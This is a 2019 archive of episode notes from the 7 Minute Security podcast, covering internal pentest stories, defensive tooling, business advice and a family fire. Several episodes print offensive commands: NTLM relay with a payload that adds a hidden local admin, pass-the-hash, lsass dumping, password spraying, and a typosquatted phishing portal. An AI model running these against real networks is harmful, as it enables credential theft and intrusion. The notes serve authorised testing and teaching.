    • What are some good strategies when approaching a red team engagement - do you always start "fresh" from the perimeter? Do you assume compromise and throw a dropbox on the network? Some combination of both?
    • What are some other low-hanging fruit organizations can use to better defend their networks?
    • Do you run across some of these good defenses - like honeypots - in your engagements?
    • If you could put on a wizard hat and solve one security problem (be it technical, personnel or something else) what would it be?

    ...and more!


    7MS #392: LAPS Reloaded Dec 19, 2019

    Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://itpro.tv/7minute.

    Today's episode is all about LAPS - Microsoft's Local Administrator Password Solution. In a nutshell, LAPS strengthens and randomizes the local administrator password on the systems across your enterprise. We talked about it way back in episode 252 but figured it was worth a revisit because:

    • It's awesome

    • It's free

    • People still haven't heard of it when I share info about it during conference talks!

    • I've got a full write-up of how to install LAPS here

    • At a recent conference people asked me two awesome edge case questions:

      • What if I aggressively delete inactive machines from my AD - does the LAPS attribute go with it?

      • What do I do if I use Deep Freeze and the LAPS password attribute in AD keeps getting out of sync with the actual password on systems because of Deep Freeze's freeze/thaw times?


    7MS #391: Securing Your Family During and After a Disaster - Part 3 Dec 12, 2019

    Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://itpro.tv/7minute.

    This is part three of this series - part 1 talked about a fire that destroyed my family's home and vehicles, and part 2 was about how to get "back on the grid" and start working with the insurance machine to find a new "normal."

    Today, I want to answer some burning questions many of you have been asking:

    • Have you hit rock bottom yet? (Spoiler alert: no, but I tell you about a moment I almost lost my mind after dropping a shoe in a storm drain)

    • How long do you get to keep rental cars before you have to replace your permanent vehicles?

    • Do you have to stay in a hotel the whole time your house is rebuilt?

    • What about if you get placed in temporary housing - do you have to rebuy your beds/furniture/clothes/etc. and keep them at your temp place, then move them again once your house is rebuilt?

    • What adjustments might you want to make to your insurance policies to make sure you have the right amount of coverage in case of emergency?


    7MS #390: Tales of Internal Network Pentest Pwnage - Part 11 Dec 06, 2019

    Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://itpro.tv/7minute.

    Today's episode is a twofer. That's right, two tales of internal network pentest pwnage. Whoop whoop! We cover:

    • What the SDAD (Single Domain Admin Dance) and DDAD (Double Domain Admin Dance) are (spoiler: imagine your dad trying to dance cool...it's like that, but more awkward)

    • A good way to quickly find domain controllers in your environment: nslookup -type=SRV _ldap._tcp.dc._msdcs.YOURDOMAIN.SUFFIX

    • This handy script runs nmap against subnets, then Eyewitness, then emails the results to you

    • Early in the engagement I'd highly recommend checking for Kerberoastable accounts

    • I really like Multirelay to help me pass hashes, like:

    MultiRelay.py -t 1.2.3.4 -u bob.admin Administrator yourmoms.admin

    • Once you get a shell, run dump to dump hashes!

    • Then, use CME to pass that hash around the network!

    crackmapexec smb 192.168.0.0/24 -u Administrator -H YOUR-HASH-GOES-HERE --local-auth

    • Then, check out this article to use NPS and get a full-featured shell on your targets

    7MS #389: Securing Your Family During and After a Disaster - Part 2 Nov 21, 2019

    SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

    In part 1 of this series we talked about a tragic event my family experienced a few weeks ago: we lost our house and vehicles in a fire. Today I'll talk about:

    • How to get "back on the grid" when starting with nothing but the clothes on your back. Checklist includes:
      • New licenses
      • New ATM/credit cards
      • Rental vehicles
      • Temporary housing
    • How the most wonderful people in the world come out of your past to lift you up and help you out - and how it may not be the people you expect
    • What's it like working with the insurance machine? What do they help with and not help with?
    • How much does it suck to lose all your stuff? (Spoiler alert: a lot)
    • The relief (as weird as that sounds) that comes with losing all your material things

    Thanks again for your support via GoFundMe


    7MS #388: Securing Your Family During and After a Disaster - Part 1 Nov 15, 2019

    In today's episode I talk about how my family's house and two vehicles were recently destroyed in a fire. The Johnson family is all ok - no injuries, thank God. However, this has turned our world upside down, and over the past week of sleepless nights I've thought a lot about how this tragedy could help others ensure their families are safe and secure both during and after a disaster. I imagine this series will go something like this:

    • Today: Talk about "day zero" - everything that happened on the day of the fire
    • Part 2: Talk about what it's like working with insurance, 3rd party vendors, getting rental cars, finding temporary housing, and basically getting "back on the grid" starting with NO identification or credit cards
    • Part 3: Talk about the people part of all this. What are the effects on the family? On the community? On our health? On our faith?

    Some folks in the security community were kind enough to set up a GoFundMe if you'd like to support my family during this time.


    7MS #387: How to Succeed in Business Without Really Crying - Part 7 Nov 11, 2019

    Today's episode features a few important changes to the tools and services I use to run 7MS:

    • Docusign is out and (sort of) replaced with Proposify
    • Voltage SecureMail is out and replaced by ShareFile
    • Ninite is rad for keeping mobile pentest dropboxes automatically updated!
    • Nessys_SortyMcSortleton has been updated to...you know...work

    Additionally, we talk about a few biz-specific challenges:

    • How do you (comfortably) talk about money with a client before the SOW hits their inbox?
    • If you're a small security consultancy of 2-5 people, do you lie about your company size to impress the big client, or tell the truth and brag about the advantages a nimble team can bring?

    7MS #386: Interview with Ryan Manship and Dave Dobrotka - Part 4 Nov 01, 2019

    SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

    I'm sorry it took me forever and a day to get this episode up, but I'm thrilled to share part 4 (the final chapter - for now anyways) of my interview with the red team guys, Ryan and Dave!

    In today's episode we talk about:

    • Running into angry system admins (that are either too fired up or not fired up enough)
    • Being wrong without being ashamed
    • When is it necessary to make too much noise to get caught during an engagement?
    • What are the top 5 tools you run on every engagement?
    • How do you deal with monthly test reports indefinitely being a copy/paste of the previous month's report?
    • How do you deal with clients who scope things in such a way that the test is almost impossible to conduct?
    • How do you deal with colleagues who take findings as their own when they talk with management?
    • How do you work with clients who don't know why they want a test - except to check some sort of compliance checkmark?
    • What is a typical average time to complete a pentest on a vendor (as part of a third-party vendor assessment)?
    • How could a fresh grad get into a red team job?
    • What do recruiters look for in candidates seeking red team positions?
    • If a red team is able to dump a whole database of hashes or bundle of local machine hashes, should they crack them?
    • What do you do when you're contracted for a pentest, but on day one you realize the org is not at all ready for one?
    • What's your favorite red team horror story?

    7MS #385: A Peek into the 7MS Mail Bag Oct 22, 2019

    Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://itpro.tv/7minute.

    Today I'm joined by a very special guest: Mrs. 7MS! She joins me on a road trip to northern MN, reads me some questions from the 7MS mail bag, and we tackle them together (with a side order of commentary on weddings, overheating iPads, cheap hotels and the realization that this is likely the first - and only - episode that Mrs. 7MS has ever listened to).

    Links to things discussed this episode:

    Wireless pentest certs:

    • SEC617 - SANS course that covers wifi pentesting (with WPA enterprise attacks)
    • Offensive Security Wireless Professional

    Good/free pentest training options:

    • Pentester Academy
    • VulnHub
    • Rastalabs
    • The Cyber Mentor

    Free logging/alerting solutions for SMBs:

    • WEFFLES
    • Logging Made Easy
    • HELK
    • Wazuh

    7MS #384: Creating Kick-Butt Credential-Capturing Phishing Campaigns Oct 12, 2019

    In this episode I talk about some things I learned about making your own kick-butt cred-capturing phishing campaign and how to do so on the (relatively) quick and (relatively) cheap! These tips include:

    • Consider this list of top 9 phishing simulators.
    • Check out GoPhish!
    • Then spin up a free tier Kali AWS box
    • Follow the instructions to install GoPhish and get it running on your AWS box
    • Use the Expired Domains site to buy up a domain that is similar to your victim - maybe just one character off - but has been around a while and has a good reputation
    • Add a G Suite or O365 email account (or whatever email service you prefer) to the new domain
    • Create a convincing cred-capturing portal on GoPhish - I used some absolutely disgusting and embarrassing HTML like this (see show notes on 7ms.us):
    • Use this awesome article to secure your fancy landing page with a LetsEncrypt cert!
    • Have fun!!!

    7MS #383: Tales of Internal Network Pentest Pwnage - Part 10 Oct 01, 2019

    SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

    This episode is a "sequel" of sorts to part 9 where I was helping another company tag-team an internal network pentest. (In announcer voice) "When we last left our heroes we had..."

    • Relayed one high-priv cred from one box to another
    • Dumped and cracked a local machine's hash
    • Passed that hash around the network
    • Found (via Bloodhound) some high value targets we wanted to grab domain admin creds from
    • Set the wdigest flag via CrackMapExec

    Today, we talk about how we came back to the pentest a few days later and scripted the procdump/lsass operation to (hopefully) grab cleartext credentials from these high value targets. Here's how we did it:

    mkdir /share
    wget -P /share https://live.sysinternals.com/procdump64.exe
    screen -R smb
    /opt/impacket/examples/smbserver.py -smb2support share /share

    Then, we ran the following CME commands to copy procdump over to the victim machine, create the dump, take the dump, then delete procdump.exe:

    crackmapexec smb 192.168.55.220 -u Administrator -p 'Winter2018!' --local-auth --exec-method smbexec -x 'copy "\\192.168.55.60\share\procdump64.exe" "c:\users\public\procdump64.exe"'

    (more on today's episode show notes)

    7MS #382: Tales of Internal Network Pentest Pwnage - Part 9 Sep 24, 2019

    Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://itpro.tv/7minute.

    Today's episode is about a pentest that was pretty unique for me. I got to ride shotgun and kind of be in the shadows while helping another team pwn a network.

    This was an especially interesting one because the client had a lot of great security defenses in place, including:

    • Strong user passwords
    • A SIEM solution that appeared to be doing a great job

    We did some looking for pwnage opportunities such as:

    • Systems missing EternalBlue patch
    • Systems missing BlueKeep patch

    What got us a foot in the door was the lack of SMB signing. Check this gist to see how you can use RunFinger.py to find hosts without SMB signing, then use Impacket and Responder to listen for - and pass - high-priv hashes.

    Side note: I'm working on getting a practical pentesting gist together in the vein of Penetration Testing: A Hands-On Introduction to Hacking and Hacker Playbook.


    7MS #381: DIY $500 Pentesting Lab Deployment Tips Sep 18, 2019

    For Windows VMs

    • Take a snapshot right after the OS is installed, as (I believe) the countdown timer for Windows evaluation mode starts upon first "real" boot.
    • Want to quickly run Windows updates on a fresh Win VM? Try this (here's the source):
    powershell Install-PackageProvider -Name NuGet -Force
    powershell Install-Module PSWindowsUpdate -Force
    powershell Set-ExecutionPolicy Bypass
    powershell Import-Module PSWindowsUpdate
    powershell Get-WindowsUpdate
    powershell Install-WindowsUpdate -AcceptAll -AutoReboot
    • To turn on remote desktop:
    Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -Name "fDenyTSConnections" -Value 0
    • To set the firewall to allow RDP:
    Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
    • To stop the freakin' Windows hosts from going to sleep:
    powercfg.exe -change -standby-timeout-ac 0
    • To automate the install of VMWare tools, grab the package from VMWare's site, decompress it, then:
    setup64.exe /s /v "/qn reboot=r"
    • To set the time zone via command line, run tzutil /l and then you can set your desired zone with something like tzutil /s "Central Standard Time"

    For Linux VMs

    • Get SSH keys regenerated and install/run openssh server:
    apt install openssh-server -y
    mkdir /etc/ssh/default_keys
    mv /etc/ssh/ssh_host_* /etc/ssh/default_keys/
    dpkg-reconfigure openssh-server
    systemctl enable ssh.service
    systemctl start ssh.service
    • Then grab some essential pentesting tools using Kali essentials, and keep 'em updated with git update

    Next user group meeting September 30!


    7MS #380: Tales of Internal Network Pentest Pwnage - Part 8 Sep 05, 2019

    Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://itpro.tv/7minute.

    Today's episode is a continuation of episode #379, where we:

    • Conducted general nmap scans (and additional scans specifically looking for Eternal Blue)
    • Sucked our nmap scans into Eyewitness
    • Captured and cracked some creds with Paperspace
    • Scraped the company's marketing Web site with brutescrape and popped a domain admin account (or so I thought!)

    Today, the adventure continues with:

    • Checking the environment for CVE-2019-1040
    • Picking apart the privileges on my "pseudo domain admin" account
    • Making a startling discovery about how almost all corp passwords were stored

    Enjoy!


    7MS #379: Tales of Internal Network Pentest Pwnage - Part 7 Aug 30, 2019

    SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

    This episode, besides talking about a man who screamed at me for not being on my cell phone, covers another tale of internal network pentest pwnage! Topics/tactics covered include:

    • Review of setting up your DIY pentest dropbox
    • Choosing the right hardware (I'm partial to this NUC)
    • Running Responder to catch creds
    • Using Eyewitness to snag screenshots of stuff discovered with nmap scanning
    • Nmap for Eternal Blue with nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms17-010 192.168.0.0/24
    • Running Sharphound to get a map of the AD environment
    • Cracking creds with Paperspace
    • When cracking, make sure to scrape the customer's public Web sites for more wordlist ideas!

    7MS #378: Interview with Zane West of Proficio Aug 22, 2019

    In today's episode, I sit down with Zane West of Proficio. Zane has been in information security for more than 20 years - starting out in the "early days" as a sysadmin and then moving up into a global infrastructure architect function in the banking world. Today Zane manages Proficio's solution and product development. I sat down with Zane over Skype to talk about how companies can better analyze and defend their networks against attacks. Specifically, we talk about:

    • How important is it to have an IT background before you jump into security?
    • How can newb(ish) security analysts and pentesters better understand the political/financial struggles a business has, rather than charge in and scream "PWN ALL THE THINGS!"
    • Is there a "right way" to step into an organization, get a lay of the land and discover/prioritize their security risks?
    • Why in the world does it take twenty seven people to run a SOC?!
    • When should an organization consider engaging an MSSP to help them with their security needs?
    • What if your MSP also provides MSSP services? Is that a good or bad thing?
    • What are some tips for successfully deploying a SIEM?
    • What is the cyber kill chain about, and is it only something for the Fortune X companies, or can smaller orgs dip their toe in it as well? (Here's a nice graph to help you understand it)

    7MS #377: DIY Pentest Dropbox Tips Aug 16, 2019

    Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://itpro.tv/7minute.

    In today's episode I cover some of the nasty "gotchas" I've run into when sending my pentest dropboxes around the country. Curious about how to set up your own portable pentest dropboxes (and/or pentest lab environments)? Check out part 1 and part 2 of the DIY Pentest Lab video series.

    Here are some of the pain points I cover today:

    • Turn the firewall off: Set Computer Configuration > Policies > Administrative Templates > Network > Network Connections > Windows Firewall > Domain Profile > Windows Firewall: Protect all network connections to Disabled. Do the same for the Standard Profile by changing Computer Configuration > Policies > Administrative Templates > Network > Network Connections > Windows Firewall > Standard Profile > Windows Firewall: Protect all network connections to Disabled.

    • Disable Windows Defender: Navigate to Computer Configuration > Administrative Templates > Windows Components > Windows Defender and choose Turn Off Windows Defender.

    • Disable power sleep settings: To stop computers from snoozing on the job, head to Computer Configuration > Policies > Administrative Templates > System > Power Management > Sleep Settings and set Allow standby states (S1-S3) when sleeping (plugged in) to Disabled.

    • Create a second disk on the Windows management VM and install BitLocker to Go

    Check out today's show notes at 7ms.us for more info!


    7MS #376: Tales of SQL Injection Pwnage Aug 12, 2019

    Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://itpro.tv/7minute.

    We cover a lot of ground today on a variety of topics:

    • I have an Oculus Quest now and I love it. My handle is turdsquirt if you ever wanna shoot some zombies together.

    • I share a story that yes, does involve poop - but only the mention of it. It's nothing like the epic tale (tail?) of my parents' dog pooping in my son's dresser drawers.

    • I had a really fun pentest recently where I found some good old school SQL injection. I took to Slack to share and since then, several of you have reached out to ask how I found the vulnerability. Here are some steps/tips I talk about on today's episode that will help:

      • Watch Sunny's Burp courses on Pluralsight to enhance your Burp abilities
      • Install CO2 from the BApp store
      • When doing a Web app pentest, feed various fields SQL injection payloads, such as the ones in PayloadsAlltheThings
      • Grab a copy of sqlmap
      • Use sites like this one to help tune your sqlmap commands to find vulnerabilities. In the end, the command I used to dump the contents of important tables was this:

    (See today's show notes on the 7MS Web site for more information!)


    7MS #375: Tales of Pentest Fail #3 Aug 02, 2019

    I swear this program isn't turning into the Dr. Phil show, but I have to say that sharing tales of fail is extremely therapeutic for me, and based on your comments, it sounds like many of you feel the same way too.

    Today's takeaways include:

    • Doing an 8-10 hour internal pentest is probably overly ambitious. Seriously, it's really NOT a lot of time.
    • If a client uses a logging/alerting system, vulnerability scanning is very loud to their digital ears
    • Checking for DNS zone transfers is a good idea!

    7MS #374: Tales of Internal Pentest Pwnage - Part 6 Jul 24, 2019

    SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

    Ok, I lied a few episodes ago, and I'm sorry! I was on an epic road trip this week and suddenly remembered the pentest that really had the shortest TTDA (time to domain admin) ever. Enjoy that tale on today's podcast! Oh, and I also reference this gist which might help you test your SIEM bells and whistles.

    Psssst - I'm sorry (but not sorry) but this episode begins with a long story about a dog pooping inside a dresser drawer. If you'd rather skip that, the actual episode begins at about 29:00.


    7MS #373: Tales of Pentest Fail #2 Jul 19, 2019

    SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

    Today's episode is a two-tale story of me failing fantastically at vulnerability scanning early in my security career. Enjoy. Because I didn't at the time. :-)


    7MS #372: Tales of Internal Pentest Pwnage - Part 5 Jul 15, 2019

    Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://pro.tv/7minute

    Today I share the (hopefully) exciting and fun conclusion to last week's episode about a tale of internal pentest pwnage! A few important notes from today's episode:

    • Need to find which hosts on your network have SMB signing disabled, and then get a nice clean list of IPs as a result? Try this:
    opt/responder/tools/RunFinger.py -i THE.SUBNET.YOU-ARE.ATTACKING/24 -g > hosts.txt
    grep "Signing:'False'" hosts.txt | grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' > targets.txt

    Source: Pwning internal networks automagically

    • Ready to pass captured hashes from one host to another? Open responder.conf and turn SMB and HTTP to Off, then get Responder running in one window, and ntlmrelayx in another. Specifically, I like to use ntlmrelayx.py -tf targets.txt where targets.txt is the list of machines you found that are not using SMB signing. I also like to add a -c to run a string of my choice. Check out this fun evil little nugget:
    net user /add ladmin1 s00p3rn4ughtyguy! /Y & net localgroup Administrators ladmin1 /add & net localgroup "Remote Desktop Users" ladmin1 /add

    So the full command would be:

    ntlmrelayx.py -tf targets.txt -c 'net user /add ladmin1 s00p3rn4ughtyguy! /Y & net localgroup Administrators ladmin1 /add & net localgroup "Remote Desktop Users" ladmin1 /add'

    Check today's show notes at https://7ms.us for more information!


    7MS #371: Tales of Internal Pentest Pwnage - Part 4 Jul 12, 2019

    Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://pro.tv/7minute

    Happy belated 4th of July! Today I've got another fun tale of internal pentest pwnage that comes out of a few recent assessments I did. These tests were really fun because the clients had good defensive measures in place, such as:

    • Having separate accounts for day-to-day operations and administrative/privileged tasks
    • Local Administrator account largely disabled across the enterprise
    • Lean membership in privileged groups (Domain Admins, Enterprise Admins, Schema Admins, etc.)
    • Hard-to-crack passwords!

    Will I succeed in getting a solid foothold on this network and (hopefully) escalate to Domain Admin? Check out today's episode to find out!


    7MS #370: Happy Secure 4th! Jul 03, 2019

    Hey folks, happy secure 4th o' July!

    In today's seven minute episode (Wha? Gasp! Yep...it's seven minutes!) I kick back a bit, give you some updates and tease/prepare you for some cool full episodes to come in the near future. Topics covered include:

    • NPK, which I talked about last week, is super awesome but I'm having issues getting my jobs to run clean. Will keep you posted on progress!

    • Tales of internal pentest pwnage - wow, folks have been sending me feedback that they really like this series. I've got a good episode coming up for you on that front, just can't share right now as the project is just wrapping up.

    • Songwriting - I enjoy writing songs about people to the tune of the old Spiderman theme song. If they ever do a show like The Voice but they're looking for people to write songs about other people based on the Spiderman theme song, I think I've got a shot.


    7MS #369: Cracking Hashes with NPK Jun 28, 2019

    Today's episode is brought to you by my friends at safepass.me. Safepass.me is the most efficient and cost-effective solution to prevent Active Directory users from setting a weak or compromised password. It's in compliance with the latest NIST password guidelines, and is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

    Today I'm having a blast with cracking hashes quickly and cost-effectively using NPK.

    For 1+ years I've loved my Paperspace config, but lately I've had some reservations about it:

    • People are telling me they're having problems installing the drivers
    • My methodology for building wordlists with HateCrack doesn't seem to work anymore
    • I often pay a lot of $ for idle time since you pay ~$5/month just for the VM itself, and then a buck and change per hour the box is running - even when it's not cracking anything.

    This week on a pentest I wasn't capturing many hashes, and when I finally did it was a really valuable one. So I wanted to throw more "oomph" at the hash but don't have a ton of days to spare.

    Enter NPK which lets you submit a hash, decide how much horsepower to throw at it, and even set a max amount of $ to spend on the effort. Super cool! I'm loving it so far!

    Note: I did have a heck of a time with the install (I'm sure it was a me thing) so I wrote up this gist to help others who might hit the same issue:

    Happy crackin'!


    7MS #368: Tales of Pentest Fail Jun 24, 2019

    This episode of the 7 Minute Security Podcast is brought to you by Authentic8, creators of Silo. Silo allows its users to conduct online investigations to collect information off the web securely and anonymously. For more information, check out Authentic8.

    In today's episode, I toss myself under the proverbial security bus and share a tale of pentest fail. Looking back, I think the most important lessons learned were:

    • Scope projects well - I've been part of many over- and under-scoped projects due to PMs and/or sales folks doing oversimplified calculations, like "URLs times X amount of dollars equals the SOW price." I recommend sending clients a more in-depth questionnaire and even jumping on a Web meeting to get a nickel tour of their apps before sending a quote.

    • Train your juniors - IMHO, they should shoulder-surf with more senior engineers a few times and not do much hands-to-keyboard work at first (except maybe helping write the report) until they demonstrate proficiency.

    • Use automated pentest tools with caution - they need proper tuning/care/feeding or they can bring down Web sites and "over test" parameters.


    7MS #367: DIY Two-Hour Risk Assessment Jun 17, 2019

    This episode is brought to you by ITProTV. Visit https://www.itpro.tv/7minsec for over 65 hours of IT training for free!

    Hey! I'm on the road again - this time with a tale encompassing:

    1. How to conduct a mini risk assessment in just two hours. Some ways to consider adding value:

      • A discussion of administrative and physical controls
      • Create a network inventory using nmap and Eyewitness
      • Conduct an external vulnerability scan with Nessus or OpenVAS
    2. How a guy with a gun turned a four-hour road trip into an epic eight hour adventure.

    Enjoy :-)


    7MS #366: Tales of Internal Pentest Pwnage - Part 3 Jun 16, 2019

    This episode is brought to you by ITProTV. Visit https://www.itpro.tv/7minsec for over 65 hours of IT training for free!

    Today's episode was recorded on the way to a new assessment, and since I had nothing but miles and time in front of me, I covered two major stories (probably not in order of importance):

    1. Why I had to get two haircuts in under an hour (spoiler: it's so I didn't look like an idiot for my client)!

    2. An internal pentesting pwnage story - including network and physical security this time around!

    Enjoy!


    7MS #365: Interview with Ryan Manship and Dave Dobrotka - Part 3 May 30, 2019

    This episode of the 7 Minute Security Podcast is brought to you by Authentic8, creators of Silo. Silo allows its users to conduct online investigations to collect information off the web securely and anonymously. For more information, check out Authentic8.

    First, a bit of miscellany:

    • If you replace "red rain" with "red team" in this song, we might just have a red team anthem on our hands!

    • If you're in the Twin Cities area and looking for an infosec analyst job, check out this posting with UBB. If interested, I can help make an electronic introduction - and/or let 'em know 7 Minute Security sent ya!

    Ok, in today's program we're talking about red teaming again with our third awesome installment with Ryan and Dave who are professional red teamers! Today we cover:

    • Recon - it's super important! It's like putting together puzzle pieces...and the more of that puzzle you can figure out, the less likely you'll be surprised and the more likely you'll succeed at your objective!

    • Reporting - how do you deliver reports in a way that blue team doesn't feel picked on, management understands the risk, and ultimately everybody leaves feeling charged to secure all the things?

    I also asked the questions folks submitted to me via LinkedIn/Slack:

    • Any tips for the most dreaded part of an assessment (reports)?

    • How do you get around PowerShell v5 with restrict language mode without having the ability to downgrade to v2?

    • What's an alternative to PowerShell tooling for internal pentesting? (hint: C# is the hotness)

    • What certs/skills should I pursue to get better at red teaming (outside of "Hey, go build a lab!")?

    • Are customers happy to get assessed by a red team exercise, or do they do it begrudgingly because of requirements/regulations?


    7MS #364: Tales of External Pentest Pwnage May 23, 2019

    This episode of the 7 Minute Security Podcast is brought to you by Authentic8, creators of Silo. Silo allows its users to conduct online investigations to collect information off the web securely and anonymously. For more information, check out Authentic8.

    This episode features cool things I'm learning about external pentesting. But first, some updates:

    • My talk at Secure360 went really well. Only slightly #awkward thing is I felt an overwhelming need to change my title slide to talk about the fact that I don't drink.

    • The 7MS User Group went well. We'll resume in the late summer or early fall and do a session on lockpicking!

    • Wednesday night my band had the honor of singing at a Minnesota LEMA service and wow, what an honor. To see the sea of officers and their supportive families and loved ones was incredibly powerful.

    On the external pentest front, here are some items we cover in today's show:

    • MailSniper's Invoke-DomainHarvestOWA helps you discover the FQDN of your mail server target. Invoke-UsernameHarvestOWA helps you figure out what username scheme your target is using. Invoke-PasswordSprayOWA helps you do a low and slow password spray to hopefully find some creds!

    • Once inside the network, CrackMapExec is your friend. You can figure out where your compromised creds are valid across the network with this syntax:

    crackmapexec smb 192.168.0.0/24 -u USER -p 'PASSWORD' -d YOURDOMAIN

    You can also find what shares you have access to with:

    crackmapexec smb 192.168.0.0/24 -u USER -p 'PASSWORD' -d YOURDOMAIN --shares

    Sift through those shares! They often have VERY delicious bits of information in them :-)


    7MS #363: Interview with Ryan Manship and Dave Dobrotka - Part 2 May 15, 2019

    This episode is brought to you by ITProTV. Visit https://www.itpro.tv/7minsec for over 65 hours of IT training for free!

    Yuss! It's true! Dave and Ryan are back!

    Back in episode #326 we met Ryan Manship of RedTeam Security and Dave Dobrotka of United HealthGroup and talked about their cool and exciting careers as professional red teamers.

    In this follow-up interview (which will be broken into a few parts), we talk through a red team engagement from start to finish. Today we cover questions like:

    • Who should have a red team exercise conducted? Who NEEDS one?

    • How do you choose an objective that makes sense?

    • What do you do about push-back from management and/or scope manipulation? (“Don’t phish our CEO! She’ll click stuff! Attack our servers, just not the production environment!!!”). Spoiler alert: your clients need to have intestinal fortitude!

    • What’s better - a “zero knowledge” red team engagement or a collaborative exercise between testers and their clients?

    • How do you attack a high-security bunker?!

    • How do you conduct a red team exercise without ending up in jail? What does your “get out of jail” card get you - and NOT get you?


    7MS #362: My Dear Friend Impostor Syndrome May 09, 2019

    This episode is brought to you by ITProTV. Visit https://www.itpro.tv/7minsec for over 65 hours of IT training for free!

    Today I take a walk (literally!), get chased by a dog (seriously!) and talk about impostor syndrome and feelings of self-loathing and doubt as I get ready to speak at Secure360 next week (insert wah-wah-waaaaaaahhhhhhh here).

    How do you deal with impostor syndrome? Personally, I'm finding some success in squashing it by forcing myself into situations where I feel like a fraud - over and over again! Over time, I feel slightly less like a sham and a bit more like I know what I'm talking about. Specifically, in this episode I talk about:

    • The thrill of getting a presentation accepted at a conference, and the dread and fear that follows
    • The awful nightmare I have the night before I speak in front of others
    • Shaking off nerves when your talk is accompanied by a sign language interpreter
    • Finding your "voice" and getting the confidence to share/present your knowledge in a way only you can

    I also share the outline to my "So You Wanna Start a Security Company?" talk, which includes:

    • What are the telltale signs that you should start a security company?
    • How do you find business when everybody and their mom seems to have a security offering?
    • What are some of the tools/services/people that can help your business succeed?

    7MS #361: Logging Made Easy May 03, 2019

    Today we're talking about Logging Made Easy, a project that, as its name implies...makes Windows endpoint logging easy! I love it. It offers a simple, digestible walkthrough of several short "chapters" to get started. These chapters include:

    Chapter 1 - Set up Windows Event Forwarding

    Chapter 2 - Sysmon Install

    Chapter 3A - Database (Easy Method)

    Chapter 3B - Database (Manual Method)

    Chapter 4 - Post Install Actions

    Besides having a small issue with a batch script (resolved as of 5/3) and another snafu (that's probably my fault), it's a simple and effective way to get logging spun up in your environment!


    7MS #360: Active Directory Security 101 - Part 2 Apr 25, 2019

    This episode of the 7 Minute Security podcast is brought to you by Netwrix. Netwrix Auditor empowers IT pros to detect, investigate and resolve critical issues before they stifle business activity, and proactively identify and mitigate misconfigurations in critical IT systems that could lead to downtime. For more information, visit netwrix.com.

    In today's program we continue a series on fundamental Active Directory security that we started back in episode 327. I took all the things I talked about in that episode, as well as the new additions discussed today:

    • Finding your most vulnerable AD abuse paths with BloodHound. For a two-part pentest tale showing how BloodHound can be used/abused by attackers, check out episodes 353 and 354.

    • Get a deep-dive look at your AD machines, users, shares, OS versions and more with Network Detective.

    • How to de-escalate local admins (and prevent them from over-using/abusing the use of their privileged account)

    • Although I haven't tested it yet, Logging Made Easy looks like an awesome and free way to get some entry-level logging set up in your environment. Can't wait for a good lab day to play!

    Here are ALL the AD Security 101 tips in a delicious [gist].


    7MS #359: Windows 10 Security Baselining Apr 19, 2019

    This episode is brought to you by ITProTV. Visit https://www.itpro.tv/7minsec for over 65 hours of IT training for free!

    In this episode I explore some ways you can turn up the security heat on your Windows workstations by mapping their security to a hardening standard and/or baseline. Specifically, I cover:

    • NIST STIG for Windows 10
    • Heimdal Security - Windows 10 Hardening Guide
    • Center for Internet Security's security benchmarks
    • Windows Security Compliance Toolkit (SCT)

    I think one path to success is to use the Windows SCT as a way to create a baseline, and then use it - plus some of the other guides and standards - to gradually turn the security screws on the OS. Don't just import a GPO template and turn on 123,456,789 settings at once. You'll likely bring the network to its knees!

    Got a better/faster/stronger way to accomplish baselining? Let me know!


    7MS #358: 4 Ways to Write a Better Pentest Report Apr 16, 2019

    This episode is brought to you by ITProTV. Visit https://www.itpro.tv/7minsec for over 65 hours of IT training for free!

